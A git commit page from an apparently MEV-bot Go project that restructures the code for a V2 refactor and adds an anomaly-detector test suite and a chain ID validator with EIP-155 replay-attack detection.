feat: create v2-prep branch with comprehensive planning

Restructured project for V2 refactor:

**Structure Changes:**
- Moved all V1 code to orig/ folder (preserved with git mv)
- Created docs/planning/ directory
- Added orig/README_V1.md explaining V1 preservation

**Planning Documents:**
- 00_V2_MASTER_PLAN.md: Complete architecture overview
  - Executive summary of critical V1 issues
  - High-level component architecture diagrams
  - 5-phase implementation roadmap
  - Success metrics and risk mitigation

- 07_TASK_BREAKDOWN.md: Atomic task breakdown
  - 99+ hours of detailed tasks
  - Every task < 2 hours (atomic)
  - Clear dependencies and success criteria
  - Organized by implementation phase

**V2 Key Improvements:**
- Per-exchange parsers (factory pattern)
- Multi-layer strict validation
- Multi-index pool cache
- Background validation pipeline
- Comprehensive observability

**Critical Issues Addressed:**
- Zero address tokens (strict validation + cache enrichment)
- Parsing accuracy (protocol-specific parsers)
- No audit trail (background validation channel)
- Inefficient lookups (multi-index cache)
- Stats disconnection (event-driven metrics)

Next Steps:
1. Review planning documents
2. Begin Phase 1: Foundation (P1-001 through P1-010)
3. Implement parsers in Phase 2
4. Build cache system in Phase 3
5. Add validation pipeline in Phase 4
6. Migrate and test in Phase 5

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
Administrator
2025-11-10 10:14:26 +01:00
parent 1773daffe7
commit 803de231ba
411 changed files with 20390 additions and 8680 deletions

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,630 @@
package security
import (
"math"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/stretchr/testify/assert"
"github.com/fraktal/mev-beta/internal/logger"
)
func TestNewAnomalyDetector(t *testing.T) {
logger := logger.New("info", "text", "")
// Test with default config
ad := NewAnomalyDetector(logger, nil)
assert.NotNil(t, ad)
assert.NotNil(t, ad.config)
assert.Equal(t, 2.5, ad.config.ZScoreThreshold)
// Test with custom config
customConfig := &AnomalyConfig{
ZScoreThreshold: 3.0,
VolumeThreshold: 4.0,
BaselineWindow: 12 * time.Hour,
EnableVolumeDetection: false,
}
ad2 := NewAnomalyDetector(logger, customConfig)
assert.NotNil(t, ad2)
assert.Equal(t, 3.0, ad2.config.ZScoreThreshold)
assert.Equal(t, 4.0, ad2.config.VolumeThreshold)
assert.Equal(t, 12*time.Hour, ad2.config.BaselineWindow)
assert.False(t, ad2.config.EnableVolumeDetection)
}
func TestAnomalyDetectorStartStop(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Test start
err := ad.Start()
assert.NoError(t, err)
assert.True(t, ad.running)
// Test start when already running
err = ad.Start()
assert.NoError(t, err)
// Test stop
err = ad.Stop()
assert.NoError(t, err)
assert.False(t, ad.running)
// Test stop when already stopped
err = ad.Stop()
assert.NoError(t, err)
}
func TestRecordMetric(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Record some normal values
metricName := "test_metric"
values := []float64{10.0, 12.0, 11.0, 13.0, 9.0, 14.0, 10.5, 11.5}
for _, value := range values {
ad.RecordMetric(metricName, value)
}
// Check pattern was created
ad.mu.RLock()
pattern, exists := ad.patterns[metricName]
ad.mu.RUnlock()
assert.True(t, exists)
assert.NotNil(t, pattern)
assert.Equal(t, metricName, pattern.MetricName)
assert.Equal(t, len(values), len(pattern.Observations))
assert.Greater(t, pattern.Mean, 0.0)
assert.Greater(t, pattern.StandardDev, 0.0)
}
func TestRecordTransaction(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Create test transaction
record := &TransactionRecord{
Hash: common.HexToHash("0x123"),
From: common.HexToAddress("0xabc"),
To: &common.Address{},
Value: 1.5,
GasPrice: 20.0,
GasUsed: 21000,
Timestamp: time.Now(),
BlockNumber: 12345,
Success: true,
}
ad.RecordTransaction(record)
// Check transaction was recorded
ad.mu.RLock()
assert.Equal(t, 1, len(ad.transactionLog))
assert.Equal(t, record.Hash, ad.transactionLog[0].Hash)
assert.Greater(t, ad.transactionLog[0].AnomalyScore, 0.0)
ad.mu.RUnlock()
}
func TestPatternStatistics(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Create pattern with known values
pattern := &PatternBaseline{
MetricName: "test",
Observations: []float64{1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
Percentiles: make(map[int]float64),
SeasonalPatterns: make(map[string]float64),
}
ad.updatePatternStatistics(pattern)
// Check statistics
assert.Equal(t, 5.5, pattern.Mean)
assert.Equal(t, 1.0, pattern.Min)
assert.Equal(t, 10.0, pattern.Max)
assert.Greater(t, pattern.StandardDev, 0.0)
assert.Greater(t, pattern.Variance, 0.0)
// Check percentiles
assert.NotEmpty(t, pattern.Percentiles)
assert.Contains(t, pattern.Percentiles, 50)
assert.Contains(t, pattern.Percentiles, 95)
}
func TestZScoreCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
pattern := &PatternBaseline{
Mean: 10.0,
StandardDev: 2.0,
}
testCases := []struct {
value float64
expected float64
}{
{10.0, 0.0}, // At mean
{12.0, 1.0}, // 1 std dev above
{8.0, -1.0}, // 1 std dev below
{16.0, 3.0}, // 3 std devs above
{4.0, -3.0}, // 3 std devs below
}
for _, tc := range testCases {
zScore := ad.calculateZScore(tc.value, pattern)
assert.Equal(t, tc.expected, zScore, "Z-score for value %.1f", tc.value)
}
// Test with zero standard deviation
pattern.StandardDev = 0
zScore := ad.calculateZScore(15.0, pattern)
assert.Equal(t, 0.0, zScore)
}
func TestAnomalyDetection(t *testing.T) {
logger := logger.New("info", "text", "")
config := &AnomalyConfig{
ZScoreThreshold: 2.0,
VolumeThreshold: 2.0,
EnableVolumeDetection: true,
EnableBehavioralAD: true,
EnablePatternDetection: true,
}
ad := NewAnomalyDetector(logger, config)
// Build baseline with normal values
normalValues := []float64{100, 105, 95, 110, 90, 115, 85, 120, 80, 125}
for _, value := range normalValues {
ad.RecordMetric("transaction_value", value)
}
// Record anomalous value
anomalousValue := 500.0 // Way above normal
ad.RecordMetric("transaction_value", anomalousValue)
// Check if alert was generated
select {
case alert := <-ad.GetAlerts():
assert.NotNil(t, alert)
assert.Equal(t, AnomalyTypeStatistical, alert.Type)
assert.Equal(t, "transaction_value", alert.MetricName)
assert.Equal(t, anomalousValue, alert.ObservedValue)
assert.Greater(t, alert.Score, 2.0)
case <-time.After(100 * time.Millisecond):
t.Error("Expected anomaly alert but none received")
}
}
func TestVolumeAnomalyDetection(t *testing.T) {
logger := logger.New("info", "text", "")
config := &AnomalyConfig{
VolumeThreshold: 2.0,
EnableVolumeDetection: true,
}
ad := NewAnomalyDetector(logger, config)
// Build baseline
for i := 0; i < 20; i++ {
record := &TransactionRecord{
Hash: common.HexToHash("0x" + string(rune(i))),
From: common.HexToAddress("0x123"),
Value: 1.0, // Normal value
GasPrice: 20.0,
Timestamp: time.Now(),
}
ad.RecordTransaction(record)
}
// Record anomalous transaction
anomalousRecord := &TransactionRecord{
Hash: common.HexToHash("0xanomaly"),
From: common.HexToAddress("0x456"),
Value: 50.0, // Much higher than normal
GasPrice: 20.0,
Timestamp: time.Now(),
}
ad.RecordTransaction(anomalousRecord)
// Check for alert
select {
case alert := <-ad.GetAlerts():
assert.NotNil(t, alert)
assert.Equal(t, AnomalyTypeVolume, alert.Type)
assert.Equal(t, 50.0, alert.ObservedValue)
case <-time.After(100 * time.Millisecond):
// Volume detection might not trigger with insufficient baseline
// This is acceptable behavior
}
}
func TestBehavioralAnomalyDetection(t *testing.T) {
logger := logger.New("info", "text", "")
config := &AnomalyConfig{
EnableBehavioralAD: true,
}
ad := NewAnomalyDetector(logger, config)
sender := common.HexToAddress("0x123")
// Record normal transactions from sender
for i := 0; i < 10; i++ {
record := &TransactionRecord{
Hash: common.HexToHash("0x" + string(rune(i))),
From: sender,
Value: 1.0,
GasPrice: 20.0, // Normal gas price
Timestamp: time.Now(),
}
ad.RecordTransaction(record)
}
// Record anomalous gas price transaction
anomalousRecord := &TransactionRecord{
Hash: common.HexToHash("0xanomaly"),
From: sender,
Value: 1.0,
GasPrice: 200.0, // 10x higher gas price
Timestamp: time.Now(),
}
ad.RecordTransaction(anomalousRecord)
// Check for alert
select {
case alert := <-ad.GetAlerts():
assert.NotNil(t, alert)
assert.Equal(t, AnomalyTypeBehavioral, alert.Type)
assert.Equal(t, sender.Hex(), alert.Source)
case <-time.After(100 * time.Millisecond):
// Behavioral detection might not trigger immediately
// This is acceptable behavior
}
}
func TestSeverityCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
testCases := []struct {
zScore float64
expected AnomalySeverity
}{
{1.5, AnomalySeverityLow},
{2.5, AnomalySeverityMedium},
{3.5, AnomalySeverityHigh},
{4.5, AnomalySeverityCritical},
}
for _, tc := range testCases {
severity := ad.calculateSeverity(tc.zScore)
assert.Equal(t, tc.expected, severity, "Severity for Z-score %.1f", tc.zScore)
}
}
func TestConfidenceCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Test with different Z-scores and sample sizes
testCases := []struct {
zScore float64
sampleSize int
minConf float64
maxConf float64
}{
{2.0, 10, 0.0, 1.0},
{5.0, 100, 0.5, 1.0},
{1.0, 200, 0.0, 1.0},
}
for _, tc := range testCases {
confidence := ad.calculateConfidence(tc.zScore, tc.sampleSize)
assert.GreaterOrEqual(t, confidence, tc.minConf)
assert.LessOrEqual(t, confidence, tc.maxConf)
}
}
func TestTrendCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Test increasing trend
increasing := []float64{1, 2, 3, 4, 5}
trend := ad.calculateTrend(increasing)
assert.Greater(t, trend, 0.0)
// Test decreasing trend
decreasing := []float64{5, 4, 3, 2, 1}
trend = ad.calculateTrend(decreasing)
assert.Less(t, trend, 0.0)
// Test stable trend
stable := []float64{5, 5, 5, 5, 5}
trend = ad.calculateTrend(stable)
assert.Equal(t, 0.0, trend)
// Test edge cases
empty := []float64{}
trend = ad.calculateTrend(empty)
assert.Equal(t, 0.0, trend)
single := []float64{5}
trend = ad.calculateTrend(single)
assert.Equal(t, 0.0, trend)
}
func TestAnomalyReport(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Add some data
ad.RecordMetric("test_metric1", 10.0)
ad.RecordMetric("test_metric2", 20.0)
record := &TransactionRecord{
Hash: common.HexToHash("0x123"),
From: common.HexToAddress("0xabc"),
Value: 1.0,
Timestamp: time.Now(),
}
ad.RecordTransaction(record)
// Generate report
report := ad.GetAnomalyReport()
assert.NotNil(t, report)
assert.Greater(t, report.PatternsTracked, 0)
assert.Greater(t, report.TransactionsAnalyzed, 0)
assert.NotNil(t, report.PatternSummaries)
assert.NotNil(t, report.SystemHealth)
assert.NotZero(t, report.Timestamp)
}
func TestPatternSummaries(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Create patterns with different trends
ad.RecordMetric("increasing", 1.0)
ad.RecordMetric("increasing", 2.0)
ad.RecordMetric("increasing", 3.0)
ad.RecordMetric("increasing", 4.0)
ad.RecordMetric("increasing", 5.0)
ad.RecordMetric("stable", 10.0)
ad.RecordMetric("stable", 10.0)
ad.RecordMetric("stable", 10.0)
summaries := ad.getPatternSummaries()
assert.NotEmpty(t, summaries)
for name, summary := range summaries {
assert.NotEmpty(t, summary.MetricName)
assert.Equal(t, name, summary.MetricName)
assert.GreaterOrEqual(t, summary.SampleCount, int64(0))
assert.Contains(t, []string{"INCREASING", "DECREASING", "STABLE"}, summary.Trend)
}
}
func TestSystemHealth(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
health := ad.calculateSystemHealth()
assert.NotNil(t, health)
assert.GreaterOrEqual(t, health.AlertChannelSize, 0)
assert.GreaterOrEqual(t, health.ProcessingLatency, 0.0)
assert.GreaterOrEqual(t, health.MemoryUsage, int64(0))
assert.GreaterOrEqual(t, health.ErrorRate, 0.0)
assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
}
func TestTransactionHistoryLimit(t *testing.T) {
logger := logger.New("info", "text", "")
config := &AnomalyConfig{
MaxTransactionHistory: 5, // Small limit for testing
}
ad := NewAnomalyDetector(logger, config)
// Add more transactions than the limit
for i := 0; i < 10; i++ {
record := &TransactionRecord{
Hash: common.HexToHash("0x" + string(rune(i))),
From: common.HexToAddress("0x123"),
Value: float64(i),
Timestamp: time.Now(),
}
ad.RecordTransaction(record)
}
// Check that history is limited
ad.mu.RLock()
assert.LessOrEqual(t, len(ad.transactionLog), config.MaxTransactionHistory)
ad.mu.RUnlock()
}
func TestPatternHistoryLimit(t *testing.T) {
logger := logger.New("info", "text", "")
config := &AnomalyConfig{
MaxPatternHistory: 3, // Small limit for testing
}
ad := NewAnomalyDetector(logger, config)
metricName := "test_metric"
// Add more observations than the limit
for i := 0; i < 10; i++ {
ad.RecordMetric(metricName, float64(i))
}
// Check that pattern history is limited
ad.mu.RLock()
pattern := ad.patterns[metricName]
assert.LessOrEqual(t, len(pattern.Observations), config.MaxPatternHistory)
ad.mu.RUnlock()
}
func TestTimeAnomalyScore(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Test business hours (should be normal)
businessTime := time.Date(2023, 1, 1, 14, 0, 0, 0, time.UTC) // 2 PM
score := ad.calculateTimeAnomalyScore(businessTime)
assert.Equal(t, 0.0, score)
// Test late night (should be suspicious)
nightTime := time.Date(2023, 1, 1, 2, 0, 0, 0, time.UTC) // 2 AM
score = ad.calculateTimeAnomalyScore(nightTime)
assert.Greater(t, score, 0.5)
// Test evening (should be medium suspicion)
eveningTime := time.Date(2023, 1, 1, 20, 0, 0, 0, time.UTC) // 8 PM
score = ad.calculateTimeAnomalyScore(eveningTime)
assert.Greater(t, score, 0.0)
assert.Less(t, score, 0.5)
}
func TestSenderFrequencyCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
sender := common.HexToAddress("0x123")
now := time.Now()
// Add recent transactions
for i := 0; i < 5; i++ {
record := &TransactionRecord{
Hash: common.HexToHash("0x" + string(rune(i))),
From: sender,
Value: 1.0,
Timestamp: now.Add(-time.Duration(i) * time.Minute),
}
ad.RecordTransaction(record)
}
// Add old transaction (should not count)
oldRecord := &TransactionRecord{
Hash: common.HexToHash("0xold"),
From: sender,
Value: 1.0,
Timestamp: now.Add(-2 * time.Hour),
}
ad.RecordTransaction(oldRecord)
frequency := ad.calculateSenderFrequency(sender)
assert.Equal(t, 5.0, frequency) // Should only count recent transactions
}
func TestAverageGasPriceCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
transactions := []*TransactionRecord{
{GasPrice: 10.0},
{GasPrice: 20.0},
{GasPrice: 30.0},
}
avgGasPrice := ad.calculateAverageGasPrice(transactions)
assert.Equal(t, 20.0, avgGasPrice)
// Test empty slice
emptyAvg := ad.calculateAverageGasPrice([]*TransactionRecord{})
assert.Equal(t, 0.0, emptyAvg)
}
func TestMeanAndStdDevCalculation(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
values := []float64{1, 2, 3, 4, 5}
mean := ad.calculateMean(values)
assert.Equal(t, 3.0, mean)
stdDev := ad.calculateStdDev(values, mean)
expectedStdDev := math.Sqrt(2.0) // For this specific sequence
assert.InDelta(t, expectedStdDev, stdDev, 0.001)
// Test empty slice
emptyMean := ad.calculateMean([]float64{})
assert.Equal(t, 0.0, emptyMean)
emptyStdDev := ad.calculateStdDev([]float64{}, 0.0)
assert.Equal(t, 0.0, emptyStdDev)
}
func TestAlertGeneration(t *testing.T) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
// Test alert ID generation
id1 := ad.generateAlertID()
id2 := ad.generateAlertID()
assert.NotEqual(t, id1, id2)
assert.Contains(t, id1, "anomaly_")
// Test description generation
pattern := &PatternBaseline{
Mean: 10.0,
}
desc := ad.generateAnomalyDescription("test_metric", 15.0, pattern, 2.5)
assert.Contains(t, desc, "test_metric")
assert.Contains(t, desc, "15.00")
assert.Contains(t, desc, "10.00")
assert.Contains(t, desc, "2.5")
// Test recommendations generation
recommendations := ad.generateRecommendations("transaction_value", 3.5)
assert.NotEmpty(t, recommendations)
assert.Contains(t, recommendations[0], "investigation")
}
func BenchmarkRecordTransaction(b *testing.B) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
record := &TransactionRecord{
Hash: common.HexToHash("0x123"),
From: common.HexToAddress("0xabc"),
Value: 1.0,
GasPrice: 20.0,
Timestamp: time.Now(),
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
ad.RecordTransaction(record)
}
}
func BenchmarkRecordMetric(b *testing.B) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
b.ResetTimer()
for i := 0; i < b.N; i++ {
ad.RecordMetric("test_metric", float64(i))
}
}
func BenchmarkCalculateZScore(b *testing.B) {
logger := logger.New("info", "text", "")
ad := NewAnomalyDetector(logger, nil)
pattern := &PatternBaseline{
Mean: 10.0,
StandardDev: 2.0,
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
ad.calculateZScore(float64(i), pattern)
}
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,499 @@
package security
import (
"fmt"
"math/big"
"sync"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/fraktal/mev-beta/internal/logger"
)
// ChainIDValidator provides comprehensive chain ID validation and EIP-155 replay protection
type ChainIDValidator struct {
logger *logger.Logger
expectedChainID *big.Int
allowedChainIDs map[uint64]bool
replayAttackDetector *ReplayAttackDetector
mu sync.RWMutex
// Chain ID validation statistics
validationCount uint64
mismatchCount uint64
replayAttemptCount uint64
lastMismatchTime time.Time
}
func (cv *ChainIDValidator) normalizeChainID(txChainID *big.Int, override *big.Int) *big.Int {
if override != nil {
// Use override when transaction chain ID is missing or placeholder
if isPlaceholderChainID(txChainID) {
return new(big.Int).Set(override)
}
}
if isPlaceholderChainID(txChainID) {
return new(big.Int).Set(cv.expectedChainID)
}
return new(big.Int).Set(txChainID)
}
func isPlaceholderChainID(id *big.Int) bool {
if id == nil || id.Sign() == 0 {
return true
}
// Treat extremely large values (legacy placeholder) as missing
if id.BitLen() >= 62 {
return true
}
return false
}
// ReplayAttackDetector tracks potential replay attacks
type ReplayAttackDetector struct {
// Track transaction hashes across different chain IDs to detect replay attempts
seenTransactions map[string]ChainIDRecord
maxTrackingTime time.Duration
mu sync.Mutex
}
// ChainIDRecord stores information about a transaction's chain ID usage
type ChainIDRecord struct {
ChainID uint64
FirstSeen time.Time
Count int
From common.Address
AlertTriggered bool
}
// ChainValidationResult contains comprehensive chain ID validation results
type ChainValidationResult struct {
Valid bool `json:"valid"`
ExpectedChainID uint64 `json:"expected_chain_id"`
ActualChainID uint64 `json:"actual_chain_id"`
IsEIP155Protected bool `json:"is_eip155_protected"`
ReplayRisk string `json:"replay_risk"` // NONE, LOW, MEDIUM, HIGH, CRITICAL
Warnings []string `json:"warnings"`
Errors []string `json:"errors"`
SecurityMetadata map[string]interface{} `json:"security_metadata"`
}
// NewChainIDValidator creates a new chain ID validator
func NewChainIDValidator(logger *logger.Logger, expectedChainID *big.Int) *ChainIDValidator {
return &ChainIDValidator{
logger: logger,
expectedChainID: expectedChainID,
allowedChainIDs: map[uint64]bool{
1: true, // Ethereum mainnet (for testing)
42161: true, // Arbitrum One mainnet
421614: true, // Arbitrum Sepolia testnet (for testing)
},
replayAttackDetector: &ReplayAttackDetector{
seenTransactions: make(map[string]ChainIDRecord),
maxTrackingTime: 24 * time.Hour, // Track for 24 hours
},
}
}
// ValidateChainID performs comprehensive chain ID validation
func (cv *ChainIDValidator) ValidateChainID(tx *types.Transaction, signerAddr common.Address, overrideChainID *big.Int) *ChainValidationResult {
actualChainID := cv.normalizeChainID(tx.ChainId(), overrideChainID)
result := &ChainValidationResult{
Valid: true,
ExpectedChainID: cv.expectedChainID.Uint64(),
ActualChainID: actualChainID.Uint64(),
SecurityMetadata: make(map[string]interface{}),
}
cv.mu.Lock()
defer cv.mu.Unlock()
cv.validationCount++
// 1. Basic Chain ID Validation
if actualChainID.Uint64() != cv.expectedChainID.Uint64() {
result.Valid = false
result.Errors = append(result.Errors,
fmt.Sprintf("Chain ID mismatch: expected %d, got %d",
cv.expectedChainID.Uint64(), actualChainID.Uint64()))
cv.mismatchCount++
cv.lastMismatchTime = time.Now()
// Log security alert
cv.logger.Warn(fmt.Sprintf("SECURITY ALERT: Chain ID mismatch detected from %s - Expected: %d, Got: %d",
signerAddr.Hex(), cv.expectedChainID.Uint64(), actualChainID.Uint64()))
}
// 2. EIP-155 Replay Protection Verification
eip155Result := cv.validateEIP155Protection(tx, actualChainID)
result.IsEIP155Protected = eip155Result.protected
if !eip155Result.protected {
result.Warnings = append(result.Warnings, "Transaction lacks EIP-155 replay protection")
result.ReplayRisk = "HIGH"
} else {
result.ReplayRisk = "NONE"
}
// 3. Chain ID Allowlist Validation
if !cv.allowedChainIDs[actualChainID.Uint64()] {
result.Valid = false
result.Errors = append(result.Errors,
fmt.Sprintf("Chain ID %d is not in the allowed list", actualChainID.Uint64()))
cv.logger.Error(fmt.Sprintf("SECURITY ALERT: Attempted transaction on unauthorized chain %d from %s",
actualChainID.Uint64(), signerAddr.Hex()))
}
// 4. Replay Attack Detection
replayResult := cv.detectReplayAttack(tx, signerAddr, actualChainID.Uint64())
if replayResult.riskLevel != "NONE" {
result.ReplayRisk = replayResult.riskLevel
result.Warnings = append(result.Warnings, replayResult.warnings...)
if replayResult.riskLevel == "CRITICAL" {
result.Valid = false
result.Errors = append(result.Errors, "Potential replay attack detected")
}
}
// 5. Chain-specific Validation
chainSpecificResult := cv.validateChainSpecificRules(tx, actualChainID.Uint64())
if !chainSpecificResult.valid {
result.Errors = append(result.Errors, chainSpecificResult.errors...)
result.Valid = false
}
result.Warnings = append(result.Warnings, chainSpecificResult.warnings...)
// 6. Add security metadata
result.SecurityMetadata["validation_timestamp"] = time.Now().Unix()
result.SecurityMetadata["total_validations"] = cv.validationCount
result.SecurityMetadata["total_mismatches"] = cv.mismatchCount
result.SecurityMetadata["signer_address"] = signerAddr.Hex()
result.SecurityMetadata["transaction_hash"] = tx.Hash().Hex()
// Log validation result for audit
if !result.Valid {
cv.logger.Error(fmt.Sprintf("Chain validation FAILED for tx %s from %s: %v",
tx.Hash().Hex(), signerAddr.Hex(), result.Errors))
}
return result
}
// EIP155Result contains EIP-155 validation results
type EIP155Result struct {
protected bool
chainID uint64
warnings []string
}
// validateEIP155Protection verifies EIP-155 replay protection is properly implemented
func (cv *ChainIDValidator) validateEIP155Protection(tx *types.Transaction, normalizedChainID *big.Int) EIP155Result {
result := EIP155Result{
protected: false,
warnings: make([]string, 0),
}
// Check if transaction has a valid chain ID (EIP-155 requirement)
if isPlaceholderChainID(tx.ChainId()) {
result.warnings = append(result.warnings, "Transaction missing chain ID (pre-EIP155)")
return result
}
chainID := normalizedChainID.Uint64()
result.chainID = chainID
// Verify the transaction signature includes chain ID protection
// EIP-155 requires v = CHAIN_ID * 2 + 35 or v = CHAIN_ID * 2 + 36
v, _, _ := tx.RawSignatureValues()
// Calculate expected v values for EIP-155
expectedV1 := chainID*2 + 35
expectedV2 := chainID*2 + 36
actualV := v.Uint64()
// Check if v value follows EIP-155 format
if actualV == expectedV1 || actualV == expectedV2 {
result.protected = true
} else {
// Check if it's a legacy transaction (v = 27 or 28)
if actualV == 27 || actualV == 28 {
result.warnings = append(result.warnings, "Legacy transaction format detected (not EIP-155 protected)")
} else {
result.warnings = append(result.warnings,
fmt.Sprintf("Invalid v value for EIP-155: got %d, expected %d or %d",
actualV, expectedV1, expectedV2))
}
}
return result
}
// ReplayResult contains replay attack detection results
type ReplayResult struct {
riskLevel string
warnings []string
}
// detectReplayAttack detects potential cross-chain replay attacks
func (cv *ChainIDValidator) detectReplayAttack(tx *types.Transaction, signerAddr common.Address, normalizedChainID uint64) ReplayResult {
result := ReplayResult{
riskLevel: "NONE",
warnings: make([]string, 0),
}
// Clean old tracking data
cv.cleanOldTrackingData()
// Create a canonical transaction representation for tracking
// Use a combination of nonce, to, value, and data to identify potential replays
txIdentifier := cv.createTransactionIdentifier(tx, signerAddr)
detector := cv.replayAttackDetector
detector.mu.Lock()
defer detector.mu.Unlock()
if record, exists := detector.seenTransactions[txIdentifier]; exists {
// This transaction pattern has been seen before
currentChainID := normalizedChainID
if record.ChainID != currentChainID {
// Same transaction on different chain - CRITICAL replay risk
result.riskLevel = "CRITICAL"
result.warnings = append(result.warnings,
fmt.Sprintf("Identical transaction detected on chain %d and %d - possible replay attack",
record.ChainID, currentChainID))
cv.replayAttackDetector.seenTransactions[txIdentifier] = ChainIDRecord{
ChainID: currentChainID,
FirstSeen: record.FirstSeen,
Count: record.Count + 1,
From: signerAddr,
AlertTriggered: true,
}
cv.replayAttemptCount++
cv.logger.Error(fmt.Sprintf("CRITICAL SECURITY ALERT: Potential replay attack detected! "+
"Transaction %s from %s seen on chains %d and %d",
txIdentifier, signerAddr.Hex(), record.ChainID, currentChainID))
} else {
// Same transaction on same chain - possible retry or duplicate
record.Count++
if record.Count > 3 {
result.riskLevel = "MEDIUM"
result.warnings = append(result.warnings, "Multiple identical transactions detected")
}
detector.seenTransactions[txIdentifier] = record
}
} else {
// First time seeing this transaction
detector.seenTransactions[txIdentifier] = ChainIDRecord{
ChainID: normalizedChainID,
FirstSeen: time.Now(),
Count: 1,
From: signerAddr,
AlertTriggered: false,
}
}
return result
}
// ChainSpecificResult contains chain-specific validation results
type ChainSpecificResult struct {
valid bool
warnings []string
errors []string
}
// validateChainSpecificRules applies chain-specific validation rules
func (cv *ChainIDValidator) validateChainSpecificRules(tx *types.Transaction, chainID uint64) ChainSpecificResult {
result := ChainSpecificResult{
valid: true,
warnings: make([]string, 0),
errors: make([]string, 0),
}
switch chainID {
case 42161: // Arbitrum One
// Arbitrum-specific validations
if tx.GasPrice() != nil && tx.GasPrice().Cmp(big.NewInt(1000000000000)) > 0 { // 1000 Gwei
result.warnings = append(result.warnings, "Unusually high gas price for Arbitrum")
}
// Check for Arbitrum-specific gas limits
if tx.Gas() > 32000000 { // Arbitrum block gas limit
result.valid = false
result.errors = append(result.errors, "Gas limit exceeds Arbitrum maximum")
}
case 421614: // Arbitrum Sepolia testnet
// Testnet-specific validations
if tx.Value() != nil && tx.Value().Cmp(new(big.Int).Mul(big.NewInt(100), big.NewInt(1e18))) > 0 { // 100 ETH
result.warnings = append(result.warnings, "Large value transfer on testnet")
}
default:
// Unknown or unsupported chain
result.valid = false
result.errors = append(result.errors, fmt.Sprintf("Unsupported chain ID: %d", chainID))
}
return result
}
// createTransactionIdentifier creates a canonical identifier for transaction tracking
func (cv *ChainIDValidator) createTransactionIdentifier(tx *types.Transaction, signerAddr common.Address) string {
// Create identifier from key transaction fields that would be identical in a replay
var toAddr string
if tx.To() != nil {
toAddr = tx.To().Hex()
} else {
toAddr = "0x0" // Contract creation
}
// Combine nonce, to, value, and first 32 bytes of data
dataPrefix := ""
if len(tx.Data()) > 0 {
end := 32
if len(tx.Data()) < 32 {
end = len(tx.Data())
}
dataPrefix = common.Bytes2Hex(tx.Data()[:end])
}
return fmt.Sprintf("%s:%d:%s:%s:%s",
signerAddr.Hex(),
tx.Nonce(),
toAddr,
tx.Value().String(),
dataPrefix)
}
// cleanOldTrackingData removes old transaction tracking data
func (cv *ChainIDValidator) cleanOldTrackingData() {
detector := cv.replayAttackDetector
detector.mu.Lock()
defer detector.mu.Unlock()
cutoff := time.Now().Add(-detector.maxTrackingTime)
for identifier, record := range detector.seenTransactions {
if record.FirstSeen.Before(cutoff) {
delete(detector.seenTransactions, identifier)
}
}
}
// GetValidationStats returns validation statistics
func (cv *ChainIDValidator) GetValidationStats() map[string]interface{} {
cv.mu.RLock()
defer cv.mu.RUnlock()
detector := cv.replayAttackDetector
detector.mu.Lock()
trackingEntries := len(detector.seenTransactions)
detector.mu.Unlock()
return map[string]interface{}{
"total_validations": cv.validationCount,
"chain_id_mismatches": cv.mismatchCount,
"replay_attempts": cv.replayAttemptCount,
"last_mismatch_time": cv.lastMismatchTime.Unix(),
"expected_chain_id": cv.expectedChainID.Uint64(),
"allowed_chain_ids": cv.getAllowedChainIDs(),
"tracking_entries": trackingEntries,
}
}
// getAllowedChainIDs returns a slice of allowed chain IDs
func (cv *ChainIDValidator) getAllowedChainIDs() []uint64 {
cv.mu.RLock()
defer cv.mu.RUnlock()
chainIDs := make([]uint64, 0, len(cv.allowedChainIDs))
for chainID := range cv.allowedChainIDs {
chainIDs = append(chainIDs, chainID)
}
return chainIDs
}
// AddAllowedChainID adds a chain ID to the allowed list
func (cv *ChainIDValidator) AddAllowedChainID(chainID uint64) {
cv.mu.Lock()
defer cv.mu.Unlock()
cv.allowedChainIDs[chainID] = true
cv.logger.Info(fmt.Sprintf("Added chain ID %d to allowed list", chainID))
}
// RemoveAllowedChainID removes a chain ID from the allowed list
func (cv *ChainIDValidator) RemoveAllowedChainID(chainID uint64) {
cv.mu.Lock()
defer cv.mu.Unlock()
delete(cv.allowedChainIDs, chainID)
cv.logger.Info(fmt.Sprintf("Removed chain ID %d from allowed list", chainID))
}
// ValidateSignerMatchesChain verifies that the signer's address matches the expected chain
func (cv *ChainIDValidator) ValidateSignerMatchesChain(tx *types.Transaction, expectedSigner common.Address) error {
// Create appropriate signer based on transaction type
var signer types.Signer
